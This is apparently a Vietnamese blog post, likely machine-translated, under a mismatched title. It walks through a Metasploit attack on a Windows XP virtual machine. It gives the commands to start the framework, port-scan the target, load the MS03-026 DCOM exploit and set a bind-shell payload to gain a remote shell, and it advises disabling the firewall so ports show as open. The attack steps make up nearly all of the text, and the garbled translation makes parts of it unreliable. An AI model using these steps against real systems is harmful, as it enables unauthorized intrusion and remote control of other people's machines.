NNB:TOP BEST MOVIE OR HACKER 2016
TOP BEST MOVIE OR HACKER 2016
6:58 AM
service postgresql start (dịch vụ bắt đầu postgresql)(Metasploit sử dụng PostgreSQL là cơ sở dữ liệu của nó nên nó cần phải được đưa ra đầu tiên.)Với PostgreSQL và chạy, chúng ta tiếp theo cần phải khởi động dịch vụ Metasploit. Lần đầu tiên các dịch vụ được khởi động, nó sẽ tạo ra một cơ sở dữ liệu người dùng msf3 và một cơ sở dữ liệu được gọi là msf3. Dịch vụ này cũng sẽ khởi chạy Metasploit RPC và máy chủ web nó đòi hỏi.
service metasploit start (dịch vụ bắt đầu Metasploit)Bây giờ cuối cùng chúng tôi đã sẵn sàng để bắt đầu khung Metasploit.
msfconsole
use auxiliary/scanner/portscan/tcp (sử dụng phụ trợ / quét / portscan / tcp)Gõ tùy chọn chương trình để xem các tùy chọn có sẵn
show options (lựa chọn chương trình)Bây giờ chúng ta phải thay đổi một vài thiết lập, trước hết, chúng ta nên giảm số lượng các cổng quét
set ports 1-500 ( thiết lập cổng 1-500)Thứ hai, chúng ta phải xác định một mục tiêu IP để quét. Bây giờ đây là một chút khó khăn, như là IP sẽ không được giống nhau trong tất cả các trường hợp. Vì vậy, đây là những gì bạn sẽ làm.Đến máy ảo XP của bạn (một trong những bạn đang cố gắng để hack). Mở dấu nhắc lệnh và gõ
ipconfigTrong các kết quả, kiểm tra IP của máy. Đây là những gì bạn sẽ phải chỉ định các tùy chọn Rhosts như.
set RHOST 192.168.63.131Dưới đây là những gì nó sẽ giống như
Có một lỗi nhỏ ở đây, tôi đánh vần Rhosts sai. Hãy chắc chắn rằng bạn thêm 's' ở cuối. |
runViệc quét sẽ bắt đầu và sau một thời gian nó sẽ cho bạn thấy những tcp cổng đang mở và dễ bị tấn công.
Tôi có 3 cổng mở thời gian này. Nếu bạn đang sử dụng một số phiên bản XP cao hơn, bạn cũng có thể cần phải vô hiệu hóa tường lửa để có được các cổng mở.
search dcomĐây là khai thác rất nổi tiếng cho Windows.
use exploit/windows/dcerpc/ms03_026_dcomBạn đang sử dụng Windows nổi tiếng nhất khai thác. Loại chương trình lựa chọn một lần nữa
show optionsMột lần nữa, thiết lập các RHOST như 192.168.63.131 (thay thế với IP của mục tiêu của bạn)
set RHOST 192.168.63.131Ngoài ra, thiết lập một tải trọng.
set PAYLOAD windows/shell_bind_tcp
exploit